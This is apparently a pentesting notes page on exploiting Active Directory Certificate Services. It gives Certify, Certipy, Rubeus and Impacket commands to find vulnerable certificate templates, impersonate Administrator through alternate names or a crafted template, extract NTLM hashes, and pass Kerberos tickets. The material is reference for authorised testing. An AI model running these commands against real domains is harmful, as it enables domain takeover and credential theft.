Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • Enumerate CA for vulnerabilities
  • Exploiting misconfigured templates
  • PKI admins group
  • Convert PEM to PFX
  • Request ticket
  • Pass the ticket
  1. Windows Pentesting

Certificate Authority (CA)

PreviousMSSQL port (1433)NextDelegation attacks

Last updated 5 months ago

Enumerate CA for vulnerabilities

Some certificate templates can be vulnerable to injection.

#Using certutil we can list templates
certutil -v -dstemplate

#Using certify.exe (locally)
.\certify.exe find /vulnerable

#Using certipy (remotely)
python3 certipy find -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128

Exploiting misconfigured templates

Request a certificate from a vulnerable template:

// Using certipy
python3 certipy req <domain>/<user>:<password>@<ca_server> <ca_name> -template '<vulnerable_template_name>' -alt '<target_user>'

// Using certify.exe
.\certify.exe request /ca:<server>\<ca-name> /template:"vulnerable_template_name>" /altname:"<alt_name>"

PKI admins group

If you are in the PKI admins group, you are able to create a vulnerable template and impersonate Administrator.

Import-Module .\ADCSTemplate.psm1                             
New-ADCSTemplate -DisplayName Incendium -JSON (Export-ADCSTemplate -DisplayName "Subordinate Certification Authority") -publish -Identity "DOMAIN\PKI Admins"

Next we request the template as Administrator:

certipy req -username incendium@domain.local -password PASS123 -ca domain-DC01-CA -target dc.domain.local -template Incendium -upn Administrator@domain.local -dns domain.local

Now we can use the PFX output file to retrieve the NT:NTLM hash of administrator by using:

certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.1.10 -username 'Administrator' -domain 'domain.local'

Convert PEM to PFX

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Request ticket

# Request the TGT
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
# if you gave the password for "cert.pfx", you need to specify the password
Rubeus.exe asktgt /user:Administrator /password:password123 /certificate:cert.pfx /ptt
# or output the file
Rubeus.exe asktgt /user:Administrator /certificate:<Thumbprint> /outfile:ticket.kirbi

Pass the ticket

impacket-ticketConverter ticket.kirbi ticke.ccache

First create a new template by using the powershell module

https://github.com/GoateePFE/ADCSTemplate
AD CS Domain EscalationHackTricks
Logo